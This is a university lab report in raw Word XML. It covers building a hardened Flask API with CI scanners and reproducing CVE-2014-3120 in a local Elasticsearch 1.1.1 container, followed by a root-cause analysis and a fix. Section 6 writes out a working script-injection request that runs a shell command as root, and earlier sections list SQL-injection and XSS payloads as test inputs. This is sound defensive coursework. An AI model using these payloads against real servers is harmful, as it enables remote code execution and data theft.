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HANGZHOU DIANZI UNIVERSITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Information Security Laboratory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>LABORATORY WORK No. 1</w:t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Secure REST API Development with CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>and Real CVE Vulnerability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5"/>
        <w:gridCol w:w="4252"/>
      </w:tblGrid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Variant No.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Student (Surname, Name)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HDU number (student ID)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Group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Date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 / ____ / 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Repository: https://github.com/mahaotian23320311/work1-secure-api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0"/>
        </w:rPr>
        <w:t>Pipeline:   https://github.com/mahaotian23320311/work1-secure-api/actions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1. Purpose of the work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goal of the work is to walk the full security lifecycle of a small backend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service: design it against the OWASP Top 10, automate the security checks in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CI/CD, then take a real, publicly documented vulnerability, reproduce it in an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isolated environment, explain its root cause, fix it and prove that the fix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works without breaking the application.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Two deliverables are produced: a working, hardened REST API with a green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pipeline, and a reproducible analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2014-3120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Elasticsearch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1.1.1 using the Vulhub environment.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2. Project and API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2.1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Layer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Choice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Why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Language / framework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Python 3.11 + Flask 3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small, explicit, easy to show the security controls in code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Storage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 xml:space="preserve">SQLite via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sqlite3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> with parameterised statements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no ORM magic hides the SQL, so the anti-injection measure is visible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Authentication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PyJWT (HS256) + bcrypt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industry-standard token and password primitives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Tests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pytest (25 tests)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every security property is pinned by a test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CI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GitHub Actions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required by the assignment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CVE lab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Docker Compose + Vulhub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isolated, disposable vulnerable environment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  <w:sz w:val="23"/>
        </w:rPr>
        <w:t>2.2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Path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Auth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Purpose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/auth/login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validate credentials, return a JWT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/api/data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 xml:space="preserve">list the post feed, optional </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>?search=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/api/notes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self-chosen endpoint</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: create a note owned by the caller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/api/notes/&lt;id&gt;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read one note (owner or admin only)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/api/me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current user profile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/health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liveness probe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Example session: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-i http://127.0.0.1:5001/api/data</w:t>
        <w:br/>
        <w:t>HTTP/1.1 401 UNAUTHORIZED</w:t>
        <w:br/>
        <w:t>WWW-Authenticate: Bearer realm="api"</w:t>
        <w:br/>
        <w:t>{"error":{"code":"missing_token","message":"A Bearer token is required."}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -X POST http://127.0.0.1:5001/auth/login -d '{"username":"alice","password":"Alice-Passw0rd!"}'</w:t>
        <w:br/>
        <w:t>{"access_token":"eyJhbGciOiJIUzI1NiIs...","token_type":"Bearer","expires_in":1800}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -H 'Authorization: Bearer &lt;token&gt;' http://127.0.0.1:5001/api/data</w:t>
        <w:br/>
        <w:t>{"count":3,"items":[{"id":1,"title":"Welcome to the secure notes API","author":"alice", ...}]}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 full 9-step curl transcript is stored in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/curl-transcript.txt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terminal running scripts/live_demo.ps1 – steps 1, 3, 4 visible]]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3. Implemented security measures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3.1 Protection against SQL injection (A03)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All database access goes through parameterised statements. The query text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values are sent separately, so a value can never be parsed as SQL syntax.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user = db.execute(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SELECT id, username, password_hash, role FROM users WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    (username,),</w:t>
        <w:br/>
        <w:t>).fetchone()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Supporting details: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no f-strings,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 xml:space="preserve"> formatting or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.format()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> near SQL anywhere in the code base;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the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?search=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> term is bound *and* its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_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wildcards are escaped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LIKE ? ESCAPE '\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?search=%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not dump the whole table;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table and column names are hard-coded, never taken from input.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Verification — the payloads below are stored as data, not executed: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-H "Authorization: Bearer $T" "http://127.0.0.1:5001/api/data?search=%27%20OR%201%3D1--"</w:t>
        <w:br/>
        <w:t>{"count":0,"items":[]}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tests/test_security.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replays </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1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alice' --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' UNION SELECT id, username, password_hash … --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>'; DROP TABLE users; --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against both the login and the search endpoint: all are refused or return zero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rows, and the table still exists afterwards.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3.2 Protection against XSS (A03)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API answers with JSON, which is *not* automatically XSS-safe — clients put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JSON into the DOM. Therefore every string is HTML-escaped on the way out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escape_deep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>app/security.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), and the response carries hardening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headers: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Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'</w:t>
        <w:br/>
        <w:t>X-Content-Type-Options: nosniff</w:t>
        <w:br/>
        <w:t>X-Frame-Options: DENY</w:t>
        <w:br/>
        <w:t>Referrer-Policy: no-referrer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Verification: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 POST .../api/notes -d '{"title":"&lt;script&gt;alert(1)&lt;/script&gt;","body":"&lt;img src=x onerror=alert(2)&gt;"}'</w:t>
        <w:br/>
        <w:t>{"id":4,"title":"&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;","body":"&amp;lt;img src=x onerror=alert(2)&amp;gt;", ...}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 stored markup comes back inert: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;img onerror&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reaches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client as markup.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3.3 Broken authentication (A07)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Password storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bcrypt with a per-password random salt and cost factor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12. Two users with the same password get different hashes; a stolen database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cannot be turned into passwords cheaply. SHA-256 would be useless here: it is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fast by design, so a GPU tests billions of candidates per second.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issuance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — HS256 JWT with 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username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nbf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 (30 min) and a random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. The signing secret comes from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environment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>); if it is absent, a random one is generated at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start-up, so no default secret can ever ship.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verification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token_required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks the header shape, decodes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with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>algorithms=["HS256"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only (which rejects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algorithm-confusion forgeries), requires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>, and then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>re-reads the user from the database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, so a deleted or downgraded account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cannot keep using an old token.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No user enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — an unknown username still costs one bcrypt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comparison (against a dummy hash) and returns exactly the same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 xml:space="preserve"> body as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wrong password.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Verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tests/test_api.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains dedicated tests for a garbage token,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an expired token, an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token, and a token signed with a different key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— all four are rejected with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>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4. CI/CD pipeline with security scanners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.github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs on every push and every pull request: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Job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Tool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Gate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 w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>test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pytest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any failing test fails the run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 w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sast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 xml:space="preserve">bandit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>-ll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any medium/high finding fails the run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 w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sca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pip-audit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any known-vulnerable dependency fails the run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Reports are uploaded as build artifacts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bandit-report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pip-audit-report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pytest-report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), which is what the assignment asks to screenshot.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Local run of the same three commands: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pytest -q</w:t>
        <w:br/>
        <w:t>25 passed</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ bandit -r app -x tests -ll</w:t>
        <w:br/>
        <w:t>No issues identified.</w:t>
        <w:br/>
        <w:t>Code scanned: 503 lines of code</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ pip-audit -r requirements.txt</w:t>
        <w:br/>
        <w:t>No known vulnerabilities found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GitHub Actions – all three jobs green]]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sast job log – "No issues identified"]]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sca job log – "No known vulnerabilities found"]]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5. Selected vulnerability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</w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4677"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr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CVE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CVE-2014-3120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Product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Elasticsearch before 1.2.0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CWE-284 – improper access control (client-supplied code evaluation)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CVSS 3.1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8.1 HIGH (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>; CVSS v2: 6.8)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Published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28 July 2014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Fixed in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1.2.0 (dynamic scripting off by default); sandbox added in 1.4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Known exploited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Yes — CISA KEV, added 2022-03-25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 xml:space="preserve">NVD, Elastic security page, Vulhub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>elasticsearch/CVE-2014-3120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Elasticsearch exposes a scripting subsystem: a search request may carry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script, and the node compiles and evaluates it inside its own JVM. Before 1.2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 default configuration allowed this for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request, with no sandbox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and no authentication, so one unauthenticated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /_search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing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java.lang.Runtime.getRuntime().exec(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs a command as the user that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started the node — root, in the official image.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Vulhub environment for this CVE is exactly that default: a single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vulhub/elasticsearch:1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> container on port 9200.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6. Reproduction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Environment: Docker Compose + Vulhub recipe (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/vulnerable/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).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vulnerability/vulnerable</w:t>
        <w:br/>
        <w:t>$ docker compose up -d</w:t>
        <w:br/>
        <w:t>$ curl -s http://127.0.0.1:9200/</w:t>
        <w:br/>
        <w:t>"number" : "1.1.1"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6.1 Index one document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-XPUT 'http://127.0.0.1:9200/blog/post/1' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">      -H 'Content-Type: application/json' -d '{"title":"hello"}'</w:t>
        <w:br/>
        <w:t>{"_index":"blog","_type":"post","_id":"1","_version":1,"created":true}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/blog/_refresh'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6.2 Make the search API execute Java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-XPOST 'http://127.0.0.1:9200/_search' -H 'Content-Type: application/json' -d '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "size":1,"query":{"match_all":{}},</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "script_fields":{"pwn":{"script":"java.lang.Runtime.getRuntime().exec(new String[]{\"sh\",\"-c\",\"id &gt; /tmp/pwned.txt\"})"}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'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response is an ordinary hit list, but the computed field is a process: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{"hits":{"total":1,"hits":[{"_index":"blog","_type":"post","_id":"1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "fields":{"pwn":["java.lang.UNIXProcess@4de0408b"]}}]}}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6.3 Prove the command ran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docker compose exec -T es cat /tmp/pwned.txt</w:t>
        <w:br/>
        <w:t>uid=0(root) gid=0(root) groups=0(root)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Both requests were executed against the running container on this machine;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exact responses are in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/cve-2014-3120-all.log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 xml:space="preserve">[[SCREENSHOT: terminal – curl _search returning UNIXProcess + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>uid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the container]]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7. Root cause analysis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Elasticsearch's scripting feature lets a query compute values on the server.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design intent was convenience ("score boost", "script fields");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security model was that the node is trusted and the client is not — except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nothing enforced that.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Dangerous default.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Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script.disable_dynamic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defaulted to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before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1.2, so any script in a request body was compiled and executed. The only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barrier between an attacker and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Runtime.getRuntime()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the JSON parser.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No sandbox.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> In 1.0/1.1 the MVEL expression is evaluated with full Java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reflection available. A scripting engine without a class filter is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>eval()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for Java; the language choice (MVEL, then Groovy) changes nothing.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No authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Elasticsearch 1.x has no users, roles or TLS, and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image binds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0.0.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The CVSS vector lists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PR:L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the vendor treats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API as privileged; on the network there is no credential at all, which is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why the effective attack is pre-auth RCE.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Blast radius.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The node runs as root in this image, so the first command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already has full control: read the data directory, reach the network, or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exhaust the heap.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defect is therefore an access-control failure around a dangerous capability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(CWE-284): code evaluation was treated as an ordinary data field. Every later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fix is a way of taking that capability away from the client.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elasticsearch.yml showing script.disable_dynamic absent / default]]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8. Applied fix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Three layers, weakest to strongest (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/hardened/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vulnerability/fixed/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>):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Configuration (mitigation)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script.disable_dynamic: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the same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1.1.1 image. The node refuses to compile scripts arriving in a request;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search fails with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptException[dynamic scripting disabled]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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Patch (upgrade)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Elasticsearch 1.4.4. Dynamic scripting has been off by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default since 1.2, and 1.4 adds a Groovy sandbox that filters classes.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Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — do not expose the scripting API to clients at all: network ACL,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 reverse proxy that rejects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script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source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in requests, or Elasticsearch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≥ 2.0, where dynamic scripting was removed.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# hardened/</w:t>
        <w:br/>
        <w:t>FROM vulhub/elasticsearch:1.1.1</w:t>
        <w:br/>
        <w:t>RUN echo "script.disable_dynamic: true" &gt;&gt; /usr/share/elasticsearch/config/elasticsearch.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># fixed/</w:t>
        <w:br/>
        <w:t>FROM vulhub/elasticsearch:1.4.4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Why this is effective: layer 1 removes the primitive ("compile what the client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sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from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reachable surface. A nuance worth stating in the report: **1.4.4 is not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end of the story** — in 2015 the 1.4.x sandbox was bypassed again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(CVE-2015-1427, Groovy sandbox escape) and 1.4.4 is still in that affected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range. That is precisely why the design layer is the durable one: "no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client-supplied scripts" survives the next clever expression, while a sandbox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has to be perfect every time.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9. Proof that the vulnerability is eliminated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Same three requests, rebuilt environments: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vulnerability/fixed &amp;&amp; docker compose up --build -d</w:t>
        <w:br/>
